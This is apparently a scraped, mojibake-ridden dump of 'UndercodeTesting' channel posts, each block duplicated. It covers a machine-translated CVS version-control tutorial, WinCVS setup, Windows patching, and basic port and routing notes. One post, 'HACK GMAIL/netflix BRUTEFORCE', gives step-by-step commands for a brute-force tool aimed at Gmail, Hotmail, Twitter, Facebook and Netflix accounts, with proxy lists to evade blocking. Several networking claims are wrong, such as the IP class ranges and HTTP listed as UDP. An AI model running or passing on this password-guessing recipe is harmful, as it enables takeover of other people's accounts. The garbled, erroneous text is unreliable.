π¦ 6 and revert to the old version
------------------------------------
cvs update -j1.20 -j1.15 ββfilenames
1.20 current version number, pay attention not to reverse the order, remember to commit, in order to ensure the previous version number, it is best to lock
attention: cvs update -r1.15 file.name -r version number is not here meant, is to add a file called sticky 1.15 a tag
if you accidentally addition STICK TAG has been the case With cvs update -A solve
------------------------------------
cvs update -j1.20 -j1.15 ββfilenames
1.20 current version number, pay attention not to reverse the order, remember to commit, in order to ensure the previous version number, it is best to lock
attention: cvs update -r1.15 file.name -r version number is not here meant, is to add a file called sticky 1.15 a tag
if you accidentally addition STICK TAG has been the case With cvs update -A solve
π¦ 7 file comparison
------------------------------------
cvs diff -c filename
cvs diff -c -r1.8- r 1.5 filename
8 Lock and unlock files
------------------------------------
To ensure serial modification Files, or modify two
cvs admin -l files
cvs admin -u files
π¦If you just use cvs in general, here it is So far it is enough. 20% of the functions of a system can often meet 80% of the needs, and CVS is no exception. The following are the most commonly used functions of CVS. You may not use 10% of all its command options. For more functions, please apply in practice. Experience in the process, how much should be used in the learning process, how much to learn, it is not too late to learn.
------------------------------------
cvs diff -c filename
cvs diff -c -r1.8- r 1.5 filename
8 Lock and unlock files
------------------------------------
To ensure serial modification Files, or modify two
cvs admin -l files
cvs admin -u files
π¦If you just use cvs in general, here it is So far it is enough. 20% of the functions of a system can often meet 80% of the needs, and CVS is no exception. The following are the most commonly used functions of CVS. You may not use 10% of all its command options. For more functions, please apply in practice. Experience in the process, how much should be used in the learning process, how much to learn, it is not too late to learn.
π¦ CVS macro / keyword
====================== ============
CVS will replace the file with a keyword (macro) by default. It is a good working habit to add these keywords to the file.
$ Id $ The keyword is to use the file name, version, and time. , The author and the nature of the code replacement, if you use the -l option to take it out, after Exp
The login user name will be added. In addition to the $ Id $ keyword, RCS also supports the following commonly used keywords:
$ Log $: the change log information you provide.
$ Author $: The author who deposited this version.
$ Locker $: The locker of this version
$ State $: The state of this version Exp (trial version), Stabe (stable version), Rel (release version). The default is Exp
$ Date $: the time this version is saved , Using UTC time format.
$ Revision $: The version number of the version
$ RCSfile $: RCS file name
$ Source $: RCS full path name
$ Name $: Symbol name to retrieve this version
$ Header $: Equivalent to $ Source $$ Revision $$ Date $ The combination of $ Author $$ State $$ Locker $
====================== ============
CVS will replace the file with a keyword (macro) by default. It is a good working habit to add these keywords to the file.
$ Id $ The keyword is to use the file name, version, and time. , The author and the nature of the code replacement, if you use the -l option to take it out, after Exp
The login user name will be added. In addition to the $ Id $ keyword, RCS also supports the following commonly used keywords:
$ Log $: the change log information you provide.
$ Author $: The author who deposited this version.
$ Locker $: The locker of this version
$ State $: The state of this version Exp (trial version), Stabe (stable version), Rel (release version). The default is Exp
$ Date $: the time this version is saved , Using UTC time format.
$ Revision $: The version number of the version
$ RCSfile $: RCS file name
$ Source $: RCS full path name
$ Name $: Symbol name to retrieve this version
$ Header $: Equivalent to $ Source $$ Revision $$ Date $ The combination of $ Author $$ State $$ Locker $
π¦ Sticky Tag
==================================
The role of tag It is a snapshot of multiple continuously changing files to represent all non-stop internal versions of a file at a certain time. Generally, it is a project to a certain stage. You can assign a stage milestone version number to all files uniformly, and you can export them at once Files with different versions. Another very important role of tags is to generate branches and merge branches.
1 cvs tag release_name module_name
----------------------- ------------- The
release_name should be concise and rich in meaning. It consists of a letter at the beginning, plus letters, numbers, underscores and hyphens, especially "."
2 cvs checkout -r release_name module_name
------------------------------------
Take out the tag_name flag file
3 cvs update -A
------------------------------------
The file identified by tag is a historical file and cannot be modified, This can remove this restriction locally and allow it to merge with the current version of
==================================
The role of tag It is a snapshot of multiple continuously changing files to represent all non-stop internal versions of a file at a certain time. Generally, it is a project to a certain stage. You can assign a stage milestone version number to all files uniformly, and you can export them at once Files with different versions. Another very important role of tags is to generate branches and merge branches.
1 cvs tag release_name module_name
----------------------- ------------- The
release_name should be concise and rich in meaning. It consists of a letter at the beginning, plus letters, numbers, underscores and hyphens, especially "."
2 cvs checkout -r release_name module_name
------------------------------------
Take out the tag_name flag file
3 cvs update -A
------------------------------------
The file identified by tag is a historical file and cannot be modified, This can remove this restriction locally and allow it to merge with the current version of
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ CVS branch management
=============================
CVS can save history Divided into multiple independent, parallel and non-influential branches, and to modify the history
1 Calibration milestone
----------------------------- -------
cvs tag release_1_0 prj_dir_name
2 Start a new milestone:
-------------------------------- ----
cvs commit -r 2
mark all files to start the development of 2.x
Note: There is no direct relationship between the recovery in CVS and the release version of the software package. However, the use of version numbers that are consistent with the published version of all files is helpful for maintenance.
3 Create a branch
------------------------------------
When developing the 2.x version of the project, it was found that 1.x had problems, but 2.x did not dare to use it, then export a branch from the previously marked milestone: release_1_0 release_1_0_b2
cvs rtag -b -r release_1_0 release_1_0_bugfixes prj_dir_name
-r What is released_1_0, -b is modified by release_1_0_bugfixes, the version number of cvs will become 4 digits, and each time it is branched in the future, the version number will increase by 2 digits.
4 branches parallel development
-------------- ----------------------
Some people first export the branch release_1_0_bugfixes in another directory: to solve the urgent problem in 1.0,
cvs checkout -r release_1_0_bugfixes
branch is OK Modified and automatically submitted to the branch
while other people are still developing the
5 tag branch on the main branch of the project 2.x
------------------------ ------------
After fixing the error on release_1_0_bugfixes, mark a 1.0 bug fix version number
cvs tag release_1_0_bugfixes_p1
6 Merge branch
----------------- -------------------
If you think 2.0 is also required to modify these errors in 2.0, can also be combined release_1_0_patch_1 at 2.0 development directory Change to the current code:
cvs update -j release_1_0_bugfixes
7 Merge the branch again
------------------------------------
If found again 1. x new bug, I have modified it in the branch and marked release_1_0_patch_2, we also hope to merge it to the trunk.
cvs update -j release_1_0_bugfixes_p1 -j release_1_0_bugfixes
It means to change release_1_0_bugfixes_p1 (tag) to release_1_0_bugfixes (branch) Part of
the previous file is merged into the current file (spine). Otherwise, the content of the previous merge will be re-merged with the 6-step method.
Note: At this time we use the result of step 5
: less frequent tagging, but at the same time, it cannot lead to tag flooding, tag In different branches, you can
lock the branch with the same name 8
------------------------------------
cvs admin -l r_0_2 lock r_0_2 branch
cvs admin -l lock main branch
9 set default branch
---------------------------------- -
cvs admin -b r_0_2 set r_0_2 default branch
cvs admin -b set the main branch
10 to delete the history
if the history file is too large, or to determine a stable version of several stages, we can remove some of the historical documents to Protect cvs performance
cvs admin -o rev1: rev2 filename delete the version from rev1 to rev2, including the two versions
cvs admin -o rev1 :: rev2 filename delete the version from rev1 to rev2, excluding the two versions.
If you omit rev1, it means deleting this branch All versions before rev2
If rev2 is omitted, it means that all versions of this branch after rev1 will be deleted.
cvs admin -o rev filename Delete the file of this version of rev.
Note: the version with tag cannot be deleted, so the tag is very important, and only a single one can be deleted. File
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ CVS branch management
=============================
CVS can save history Divided into multiple independent, parallel and non-influential branches, and to modify the history
1 Calibration milestone
----------------------------- -------
cvs tag release_1_0 prj_dir_name
2 Start a new milestone:
-------------------------------- ----
cvs commit -r 2
mark all files to start the development of 2.x
Note: There is no direct relationship between the recovery in CVS and the release version of the software package. However, the use of version numbers that are consistent with the published version of all files is helpful for maintenance.
3 Create a branch
------------------------------------
When developing the 2.x version of the project, it was found that 1.x had problems, but 2.x did not dare to use it, then export a branch from the previously marked milestone: release_1_0 release_1_0_b2
cvs rtag -b -r release_1_0 release_1_0_bugfixes prj_dir_name
-r What is released_1_0, -b is modified by release_1_0_bugfixes, the version number of cvs will become 4 digits, and each time it is branched in the future, the version number will increase by 2 digits.
4 branches parallel development
-------------- ----------------------
Some people first export the branch release_1_0_bugfixes in another directory: to solve the urgent problem in 1.0,
cvs checkout -r release_1_0_bugfixes
branch is OK Modified and automatically submitted to the branch
while other people are still developing the
5 tag branch on the main branch of the project 2.x
------------------------ ------------
After fixing the error on release_1_0_bugfixes, mark a 1.0 bug fix version number
cvs tag release_1_0_bugfixes_p1
6 Merge branch
----------------- -------------------
If you think 2.0 is also required to modify these errors in 2.0, can also be combined release_1_0_patch_1 at 2.0 development directory Change to the current code:
cvs update -j release_1_0_bugfixes
7 Merge the branch again
------------------------------------
If found again 1. x new bug, I have modified it in the branch and marked release_1_0_patch_2, we also hope to merge it to the trunk.
cvs update -j release_1_0_bugfixes_p1 -j release_1_0_bugfixes
It means to change release_1_0_bugfixes_p1 (tag) to release_1_0_bugfixes (branch) Part of
the previous file is merged into the current file (spine). Otherwise, the content of the previous merge will be re-merged with the 6-step method.
Note: At this time we use the result of step 5
: less frequent tagging, but at the same time, it cannot lead to tag flooding, tag In different branches, you can
lock the branch with the same name 8
------------------------------------
cvs admin -l r_0_2 lock r_0_2 branch
cvs admin -l lock main branch
9 set default branch
---------------------------------- -
cvs admin -b r_0_2 set r_0_2 default branch
cvs admin -b set the main branch
10 to delete the history
if the history file is too large, or to determine a stable version of several stages, we can remove some of the historical documents to Protect cvs performance
cvs admin -o rev1: rev2 filename delete the version from rev1 to rev2, including the two versions
cvs admin -o rev1 :: rev2 filename delete the version from rev1 to rev2, excluding the two versions.
If you omit rev1, it means deleting this branch All versions before rev2
If rev2 is omitted, it means that all versions of this branch after rev1 will be deleted.
cvs admin -o rev filename Delete the file of this version of rev.
Note: the version with tag cannot be deleted, so the tag is very important, and only a single one can be deleted. File
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Watchers CVS
=============================
cvs provides a watch function to help everyone understand who is doing what and who is doing the file What operation, it sends email notification to coordinate everyone's work.
1 Turn on the watch function
. Add the following line to the CVSROOT / notify file.
ALL mail% s -s ββ"CVS notification"
2 Set the external email address. The
default is to send notification messages to the local email, to be sent to other addresses. CVSROOT / users add the following content
hwz: kerlion@netease.com
3 watch file modification
cvs watch add filename
cvs watch remove filename
4 watch file modification
watch function is a coordinated function for everyone, everyone must do it in accordance with a unified workflow, If you do not cvs edit, cvs has no way to notify the modification
cvs edit filename to
modify the file
cvs unedit filename
5 Remind everyone to use the watch function
cvs does not have the function of forcing the use of watch. Only this function automatically changes the file to read-only after the user submits it. Then use cvs edit filename to modify it.
cvs watch on
6 View that everyone watch
cvs watchers
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Watchers CVS
=============================
cvs provides a watch function to help everyone understand who is doing what and who is doing the file What operation, it sends email notification to coordinate everyone's work.
1 Turn on the watch function
. Add the following line to the CVSROOT / notify file.
ALL mail% s -s ββ"CVS notification"
2 Set the external email address. The
default is to send notification messages to the local email, to be sent to other addresses. CVSROOT / users add the following content
hwz: kerlion@netease.com
3 watch file modification
cvs watch add filename
cvs watch remove filename
4 watch file modification
watch function is a coordinated function for everyone, everyone must do it in accordance with a unified workflow, If you do not cvs edit, cvs has no way to notify the modification
cvs edit filename to
modify the file
cvs unedit filename
5 Remind everyone to use the watch function
cvs does not have the function of forcing the use of watch. Only this function automatically changes the file to read-only after the user submits it. Then use cvs edit filename to modify it.
cvs watch on
6 View that everyone watch
cvs watchers
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
WinCVS And configuration
=============================
1) Introduction of WinCVS:
WinCVS is a client software of CVS, which runs on Windows , Used to log in to the CVS server on Windows, and then perform some CVS-related operations and management. Since many enterprises currently use Linux / Unix as the server and Windows as the client, WinCVS and the CVS server will form one of the most powerful version control and management systems.
2) Download and installation
of WinCVS ; the latest WinCVS can be downloaded from http://sourceforge.net/project/showfiles.php?group_id=10072, or the latest version can be downloaded from http://sourceforge.net/project Or other versions of WinCVS.
After downloading the corresponding version, install according to the wizard. For users who have already used CVS, it should be no problem to install this WinCVS!
3) Configure WinCVS:
a. Admin-> Preferences ... / general
CVSROOT Fill in the
Authentication in cvsroot format : used to configure the authentication method of the cvs server. Generally, you only need to select the default pserver method.
It should be noted that it must be consistent
with the authentication method specified during the configuration of the cvs server. If you want to use the ssh server, make sure that openssl is installed in windows, openssh
a, Admin-> Preferences ... / Globals
The configuration is mainly to pay attention to these Options:
Checkout read-only: selected by default, it is recommended not to modify, but you need to edit selection before modifying the file, and it will automatically become read-only after submission.
This has two advantages:
one can undo you through unedit selection. Modification
Two is the usage specification
Prune empty directories: do not select it, otherwise, empty directories will be deleted automatically;
4) Log in to the server:
select Admin-> login, the following dialog box will appear asking the user to enter the login password in the
wincvs command The exit code 0 indicates correct execution, otherwise it fails, and the general success is displayed as
***** CVS exited normally with code 0 *****
5) There is a menu for the use of winCVS, if you are familiar with the use of cvs, use It's very easy, I won't say more
WRITTEN BY UNDERCODERS
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
WinCVS And configuration
=============================
1) Introduction of WinCVS:
WinCVS is a client software of CVS, which runs on Windows , Used to log in to the CVS server on Windows, and then perform some CVS-related operations and management. Since many enterprises currently use Linux / Unix as the server and Windows as the client, WinCVS and the CVS server will form one of the most powerful version control and management systems.
2) Download and installation
of WinCVS ; the latest WinCVS can be downloaded from http://sourceforge.net/project/showfiles.php?group_id=10072, or the latest version can be downloaded from http://sourceforge.net/project Or other versions of WinCVS.
After downloading the corresponding version, install according to the wizard. For users who have already used CVS, it should be no problem to install this WinCVS!
3) Configure WinCVS:
a. Admin-> Preferences ... / general
CVSROOT Fill in the
Authentication in cvsroot format : used to configure the authentication method of the cvs server. Generally, you only need to select the default pserver method.
It should be noted that it must be consistent
with the authentication method specified during the configuration of the cvs server. If you want to use the ssh server, make sure that openssl is installed in windows, openssh
a, Admin-> Preferences ... / Globals
The configuration is mainly to pay attention to these Options:
Checkout read-only: selected by default, it is recommended not to modify, but you need to edit selection before modifying the file, and it will automatically become read-only after submission.
This has two advantages:
one can undo you through unedit selection. Modification
Two is the usage specification
Prune empty directories: do not select it, otherwise, empty directories will be deleted automatically;
4) Log in to the server:
select Admin-> login, the following dialog box will appear asking the user to enter the login password in the
wincvs command The exit code 0 indicates correct execution, otherwise it fails, and the general success is displayed as
***** CVS exited normally with code 0 *****
5) There is a menu for the use of winCVS, if you are familiar with the use of cvs, use It's very easy, I won't say more
WRITTEN BY UNDERCODERS
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
sourceforge.net
The CvsGui project - Browse Files at SourceForge.net
The CvsGui project is providing several high-end interface clients (WinCvs, MacCvs, gCvs) written in C++ using popular frameworks (MFC, PowerPlant,β¦
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦HACK GMAIL/netflix..... BRUTEFORCE β :
T.me/UndercodeTesting
π¦ πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/Matrix07ksa/Brute_Force.git
2) cd Brute_Force
3) sudo apt install python3 python3-pip
pip3 install proxylist
pip3 install mechanize
4) BruteForce Gmail Attack
python3 Brute_Force.py -g Account@gmail.com -l File_list
python3 Brute_Force.py -g Account@gmail.com -p Password_Single
> BruteForce Hotmail Attack
python3 Brute_Force.py -t Account@hotmail.com -l File_list
python3 Brute_Force.py -t Account@hotmail.com -p Password_Single
> BruteForce Twitter Attack
python3 Brute_Force.py -T Account_Twitter -l File_list
python3 Brute_Force.py -T Account_Twitter -l File_list -X proxy-list.txt
BruteForce Facebook Attack
python3 Brute_Force.py -f Account_facebook -l File_list
python3 Brute_Force.py -f Account_facebook -l File_list -X proxy-list.txt
> BruteForce Netflix Attack
Start On Vpn/proxies list > prevent blocking ...
python3 Brute_Force.py -n Account_Netflix -l File_list
python3 Brute_Force.py -n Account_Netflix -l File_list -X proxy-list.txt
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦HACK GMAIL/netflix..... BRUTEFORCE β :
T.me/UndercodeTesting
π¦ πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/Matrix07ksa/Brute_Force.git
2) cd Brute_Force
3) sudo apt install python3 python3-pip
pip3 install proxylist
pip3 install mechanize
4) BruteForce Gmail Attack
python3 Brute_Force.py -g Account@gmail.com -l File_list
python3 Brute_Force.py -g Account@gmail.com -p Password_Single
> BruteForce Hotmail Attack
python3 Brute_Force.py -t Account@hotmail.com -l File_list
python3 Brute_Force.py -t Account@hotmail.com -p Password_Single
> BruteForce Twitter Attack
python3 Brute_Force.py -T Account_Twitter -l File_list
python3 Brute_Force.py -T Account_Twitter -l File_list -X proxy-list.txt
BruteForce Facebook Attack
python3 Brute_Force.py -f Account_facebook -l File_list
python3 Brute_Force.py -f Account_facebook -l File_list -X proxy-list.txt
> BruteForce Netflix Attack
Start On Vpn/proxies list > prevent blocking ...
python3 Brute_Force.py -n Account_Netflix -l File_list
python3 Brute_Force.py -n Account_Netflix -l File_list -X proxy-list.txt
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Intranet WSUS service-How it work ?
1) Applicable objects: All computers that have joined the intranet Active Directory domain, or have manually set up access to the intranet WSUS service (administrators can download the service configuration script)
2) For users in non-technical departments, the system can be set to automatically download and install the required security patches at regular intervals. Users only need to restart the computer as prompted.
3) For users in other departments, the system can be set to automatically download the required security patches and prompt installation, and users can follow the prompts to install and restart the system.
4) If you want to install the patch as soon as possible, the user can restart the computer once.
π¦Intranet WSUS service-How it work ?
1) Applicable objects: All computers that have joined the intranet Active Directory domain, or have manually set up access to the intranet WSUS service (administrators can download the service configuration script)
2) For users in non-technical departments, the system can be set to automatically download and install the required security patches at regular intervals. Users only need to restart the computer as prompted.
3) For users in other departments, the system can be set to automatically download the required security patches and prompt installation, and users can follow the prompts to install and restart the system.
4) If you want to install the patch as soon as possible, the user can restart the computer once.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦SMB server remote code execution vulnerability
> Microsoft Update Service
1) Applicable objects: All computers that cannot use the intranet WSUS service, including computers that do not have the intranet WSUS service enabled, and computers that have the intranet WSUS service enabled but are not connected to the intranet.
2) For computers that have not enabled the WSUS service on the intranet, users need to ensure that Windows automatic updates are enabled, follow the prompts to install patches and restart the computer
3) For computers with the intranet WSUS service enabled but not connected to the intranet, users need to click the Start menu-All Programs-windowsupdate, click "Check online for updates from windows update" and follow the prompts.
π¦SMB server remote code execution vulnerability
> Microsoft Update Service
1) Applicable objects: All computers that cannot use the intranet WSUS service, including computers that do not have the intranet WSUS service enabled, and computers that have the intranet WSUS service enabled but are not connected to the intranet.
2) For computers that have not enabled the WSUS service on the intranet, users need to ensure that Windows automatic updates are enabled, follow the prompts to install patches and restart the computer
3) For computers with the intranet WSUS service enabled but not connected to the intranet, users need to click the Start menu-All Programs-windowsupdate, click "Check online for updates from windows update" and follow the prompts.
π¦ A computer can be specified with multiple IP addresses, and through a specific technology, multiple servers can share an IP address.
> Each interface in the Internet must have a unique IP address, divided into five categories:
Class A is reserved for the government and consists of a 1-byte network address and a 3-byte host address. The highest bit of the network address must be 0 ; The address range is 1.0.0.1 ~ 126.255.255.254
> Class B medium-sized companies, 2 bytes network address, 2 bytes host address, the highest bit of the network address must be 10,128.0.0.1 ~ 223.255.255.254
Class C is assigned to need The highest bit of the person must be 110
192.0.0.1 ~ 239.255.255.254
> Class D is used for multicast. The first byte starts with 1110. It is a specially reserved address and does not point to a specific network. Class E is used for experiments;
> Each interface in the Internet must have a unique IP address, divided into five categories:
Class A is reserved for the government and consists of a 1-byte network address and a 3-byte host address. The highest bit of the network address must be 0 ; The address range is 1.0.0.1 ~ 126.255.255.254
> Class B medium-sized companies, 2 bytes network address, 2 bytes host address, the highest bit of the network address must be 10,128.0.0.1 ~ 223.255.255.254
Class C is assigned to need The highest bit of the person must be 110
192.0.0.1 ~ 239.255.255.254
> Class D is used for multicast. The first byte starts with 1110. It is a specially reserved address and does not point to a specific network. Class E is used for experiments;
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ANY HACKER MUST KNOW THIS :
instagram.com/UndercodeTesting
1) Ports, ports in the hardware field are interfaces. The port in the software field generally refers to the communication protocol port for connection service and connectionless service in the network. It is an abstract software structure, including some data structures and io buffers. The port here specifically refers to the port in tcp / ip. Logical port.
2) Classification,
port distribution
Well-known port, 0-1023 is tightly bound to some specific services, which clearly indicates
the protocol of a certain service. It is not possible to redefine the
registration port of the role object. For many other purposes, different programs can be defined by themselves as needed.
> Dynamic and / or private ports, 49152-65535, theoretically should not assign common services to these ports. Easy to conceal.
Protocol type
> TCP port and UDP port, the two protocols are independent of each other, and the port number is also independent of
> TCP common ports: FTP file transfer protocol, port 21, download and upload files
Telnet: remote login port, can provide a communication service based on DOS mode , 23, the previous BBS
> SMTP, a simple mail transfer protocol, 25
POP3: corresponds to SMTP, used to receive mail, usually POP3 protocol using 110
as long as there is a corresponding program that uses the POP3 protocol, you can log in to the mailbox interface without web. Instead, use a mail program to accept mail directly.
UDP commonly used ports: HTTP hypertext transfer protocol, open 80 to provide services on the computer that provides web page resources.
> DNS: used for domain name resolution services, domain name and IP conversion, 53
SNMP: Simple Network Management Protocol, 161, used to manage network equipment, because there are many network equipment, so connectionless services can show advantages.
> QQ: The program both accepts and provides services. The connectionless protocol is UDP. The QQ server uses 8000 to listen for incoming messages, and 4000 sends out text messages
> TO VIiew the port. You can use some tools to master the port usage. You can use Netstat
scan in Windows . Open ports are important
π¦Routing: The activity of moving information from a source location to a target location through a linked network. During the routing process, information will pass through at least one or more intermediate nodes.
> Router: The main node equipment of the Internet. The router determines the data forwarding through routing. The forwarding strategy is called routing. The interconnection hub of different networks, the router system has become the main context based on TCP / IP.
> Gateway: Inter-network connector, protocol converter, the most complex network interconnection device, only used for the interconnection of two networks with different high-level protocols. The gateway can be used for WAN interconnection or local area network, using different communication protocols. The data format or language, or even between two systems with completely different architectures, the gateway is a translator. The gateway to connect two networks.
Routing and gateway
> Gateway refers to the gateway under the TCP / IP protocol cluster. The gateway is essentially the IP address of one network leading to another network. If the host A finds that the target of the data is not in the local network, it sends the data to its own gateway. , Sent to the gateway of B, and then forwarded to the host.
> Ping is only available when IP is installed. Sending data packets and receiving response information, the local host and the remote host must exchange a large number of data packets to trust the correctness of the IP.
// dos command learning
intrusion method
π¦ANY HACKER MUST KNOW THIS :
instagram.com/UndercodeTesting
1) Ports, ports in the hardware field are interfaces. The port in the software field generally refers to the communication protocol port for connection service and connectionless service in the network. It is an abstract software structure, including some data structures and io buffers. The port here specifically refers to the port in tcp / ip. Logical port.
2) Classification,
port distribution
Well-known port, 0-1023 is tightly bound to some specific services, which clearly indicates
the protocol of a certain service. It is not possible to redefine the
registration port of the role object. For many other purposes, different programs can be defined by themselves as needed.
> Dynamic and / or private ports, 49152-65535, theoretically should not assign common services to these ports. Easy to conceal.
Protocol type
> TCP port and UDP port, the two protocols are independent of each other, and the port number is also independent of
> TCP common ports: FTP file transfer protocol, port 21, download and upload files
Telnet: remote login port, can provide a communication service based on DOS mode , 23, the previous BBS
> SMTP, a simple mail transfer protocol, 25
POP3: corresponds to SMTP, used to receive mail, usually POP3 protocol using 110
as long as there is a corresponding program that uses the POP3 protocol, you can log in to the mailbox interface without web. Instead, use a mail program to accept mail directly.
UDP commonly used ports: HTTP hypertext transfer protocol, open 80 to provide services on the computer that provides web page resources.
> DNS: used for domain name resolution services, domain name and IP conversion, 53
SNMP: Simple Network Management Protocol, 161, used to manage network equipment, because there are many network equipment, so connectionless services can show advantages.
> QQ: The program both accepts and provides services. The connectionless protocol is UDP. The QQ server uses 8000 to listen for incoming messages, and 4000 sends out text messages
> TO VIiew the port. You can use some tools to master the port usage. You can use Netstat
scan in Windows . Open ports are important
π¦Routing: The activity of moving information from a source location to a target location through a linked network. During the routing process, information will pass through at least one or more intermediate nodes.
> Router: The main node equipment of the Internet. The router determines the data forwarding through routing. The forwarding strategy is called routing. The interconnection hub of different networks, the router system has become the main context based on TCP / IP.
> Gateway: Inter-network connector, protocol converter, the most complex network interconnection device, only used for the interconnection of two networks with different high-level protocols. The gateway can be used for WAN interconnection or local area network, using different communication protocols. The data format or language, or even between two systems with completely different architectures, the gateway is a translator. The gateway to connect two networks.
Routing and gateway
> Gateway refers to the gateway under the TCP / IP protocol cluster. The gateway is essentially the IP address of one network leading to another network. If the host A finds that the target of the data is not in the local network, it sends the data to its own gateway. , Sent to the gateway of B, and then forwarded to the host.
> Ping is only available when IP is installed. Sending data packets and receiving response information, the local host and the remote host must exchange a large number of data packets to trust the correctness of the IP.
// dos command learning
intrusion method
> data-driven attacks, illegal use of system files, forgery of information attacks
against information protocol weaknesses, remote manipulation,
retransmission attacks using system administrator's error attacks, attacks on ICMP messages, targeting original path options Vulnerability attacks
Ethernet broadcast attacks, hopping attacks, stealing TCP protocol links, and taking control of the
system.
> System vulnerabilities refer to flaws in the logical design of application software or operating systems or errors in writing. Human reasons, objective reasons, hardware reasons
Information collection, the first step in collecting information is to obtain an IP address, if you are in a local area network, you need to obtain the DSN server
ping URL of the domain where the machine is located to obtain the website IP
nslookup DNS server
IP location query website IP138 whois in the domain where the machine is located can also find
vulnerabilities in the website registration information monitoring system.
> The scanner is a program that automatically detects security weaknesses in remote or local hosts. By using the scanner, users can leave no traces To discover the allocation of various TCP ports of remote servers, the services provided and their software versions.
How it works: By selecting remote TCP / IP different port services and recording the answers given by the target, a lot of information about the target host is collected.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
against information protocol weaknesses, remote manipulation,
retransmission attacks using system administrator's error attacks, attacks on ICMP messages, targeting original path options Vulnerability attacks
Ethernet broadcast attacks, hopping attacks, stealing TCP protocol links, and taking control of the
system.
> System vulnerabilities refer to flaws in the logical design of application software or operating systems or errors in writing. Human reasons, objective reasons, hardware reasons
Information collection, the first step in collecting information is to obtain an IP address, if you are in a local area network, you need to obtain the DSN server
ping URL of the domain where the machine is located to obtain the website IP
nslookup DNS server
IP location query website IP138 whois in the domain where the machine is located can also find
vulnerabilities in the website registration information monitoring system.
> The scanner is a program that automatically detects security weaknesses in remote or local hosts. By using the scanner, users can leave no traces To discover the allocation of various TCP ports of remote servers, the services provided and their software versions.
How it works: By selecting remote TCP / IP different port services and recording the answers given by the target, a lot of information about the target host is collected.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β